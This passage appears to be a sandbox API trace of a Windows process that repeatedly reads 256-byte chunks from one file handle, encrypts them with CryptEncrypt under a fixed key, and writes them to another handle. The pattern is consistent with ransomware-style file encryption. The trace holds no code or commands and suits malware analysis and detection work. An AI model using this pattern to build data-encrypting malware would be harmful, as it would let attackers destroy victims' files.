pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.038] GetLastError () returned 0x0 [0144.038] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.038] ReadFile (in: hFile=0x1618, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.038] CryptEncrypt (in: hKey=0x982110, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.038] GetLastError () returned 0x0 [0144.038] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.039] ReadFile (in: hFile=0x1618, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.039] CryptEncrypt (in: hKey=0x982110, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.039] GetLastError () returned 0x0 [0144.039] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.039] ReadFile (in: hFile=0x1618, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.039] CryptEncrypt (in: hKey=0x982110, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.039] GetLastError () returned 0x0 [0144.039] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.039] ReadFile (in: hFile=0x1618, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.039] CryptEncrypt (in: hKey=0x982110, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.039] GetLastError () returned 0x0 [0144.039] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.039] ReadFile (in: hFile=0x1618, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.039] CryptEncrypt (in: hKey=0x982110, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.039] GetLastError () returned 0x0 [0144.039] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.039] ReadFile (in: hFile=0x1618, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.039] CryptEncrypt (in: hKey=0x982110, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.039] GetLastError () returned 0x0 [0144.039] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.039] ReadFile (in: hFile=0x1618, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.039] CryptEncrypt (in: hKey=0x982110, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.039] GetLastError () returned 0x0 [0144.039] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.040] ReadFile (in: hFile=0x1618, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.040] CryptEncrypt (in: hKey=0x982110, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.040] GetLastError () returned 0x0 [0144.040] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.040] ReadFile (in: hFile=0x1618, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.040] CryptEncrypt (in: hKey=0x982110, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.040] GetLastError () returned 0x0 [0144.040] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.040] ReadFile (in: hFile=0x1618, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.040] CryptEncrypt (in: hKey=0x982110, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.040] GetLastError () returned 0x0 [0144.040] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.040] ReadFile (in: hFile=0x1618, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.040] CryptEncrypt (in: hKey=0x982110, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.040] GetLastError () returned 0x0 [0144.040] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.040] ReadFile (in: hFile=0x1618, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.040] CryptEncrypt (in: hKey=0x982110, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.040] GetLastError () returned 0x0 [0144.040] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.040] ReadFile (in: hFile=0x1618, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.040] CryptEncrypt (in: hKey=0x982110, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.040] GetLastError () returned 0x0 [0144.040] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.040] ReadFile (in: hFile=0x1618, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.041] CryptEncrypt (in: hKey=0x982110, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.041] GetLastError () returned 0x0 [0144.041] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.041] ReadFile (in: hFile=0x1618, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.041] CryptEncrypt (in: hKey=0x982110, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.041] GetLastError () returned 0x0 [0144.041] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.041] ReadFile (in: hFile=0x1618, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.041] CryptEncrypt (in: hKey=0x982110, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.041] GetLastError () returned 0x0 [0144.041] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.041] ReadFile (in: hFile=0x1618, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.041] CryptEncrypt (in: hKey=0x982110, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.041] GetLastError () returned 0x0 [0144.041] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.041] ReadFile (in: hFile=0x1618, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.041] CryptEncrypt (in: hKey=0x982110, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.041] GetLastError () returned 0x0 [0144.041] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.041] ReadFile (in: hFile=0x1618, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.041] CryptEncrypt (in: hKey=0x982110, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.041] GetLastError () returned 0x0 [0144.041] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.041] ReadFile (in: hFile=0x1618, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.041] CryptEncrypt (in: hKey=0x982110, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.042] GetLastError () returned 0x0 [0144.042] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.042] ReadFile (in: hFile=0x1618, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.042] CryptEncrypt (in: hKey=0x982110, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.042] GetLastError () returned 0x0 [0144.042] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.042] ReadFile (in: hFile=0x1618, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.042] CryptEncrypt (in: hKey=0x982110, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.042] GetLastError () returned 0x0 [0144.042] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.042] ReadFile (in: hFile=0x1618, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.042] CryptEncrypt (in: hKey=0x982110, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.042] GetLastError () returned 0x0 [0144.042] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.042] ReadFile (in: hFile=0x1618, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.042] CryptEncrypt (in: hKey=0x982110, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.042] GetLastError () returned 0x0 [0144.042] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.042] ReadFile (in: hFile=0x1618, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.042] CryptEncrypt (in: hKey=0x982110, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.042] GetLastError () returned 0x0 [0144.042] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.042] ReadFile (in: hFile=0x1618, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.042] CryptEncrypt (in: hKey=0x982110, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.042] GetLastError () returned 0x0 [0144.042] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.043] ReadFile (in: hFile=0x1618, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.043] CryptEncrypt (in: hKey=0x982110, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.043] GetLastError () returned 0x0 [0144.043] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.043] ReadFile (in: hFile=0x1618, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.043] CryptEncrypt (in: hKey=0x982110, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.043] GetLastError () returned 0x0 [0144.043] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.043] ReadFile (in: hFile=0x1618, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.043] CryptEncrypt (in: hKey=0x982110, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.043] GetLastError () returned 0x0 [0144.043] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.043] ReadFile (in: hFile=0x1618, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.043] CryptEncrypt (in: hKey=0x982110, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.043] GetLastError () returned 0x0 [0144.043] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.043] ReadFile (in: hFile=0x1618, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.043] CryptEncrypt (in: hKey=0x982110, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.043] GetLastError () returned 0x0 [0144.043] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.043] ReadFile (in: hFile=0x1618, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.043] CryptEncrypt (in: hKey=0x982110, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.043] GetLastError () returned 0x0 [0144.043] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, 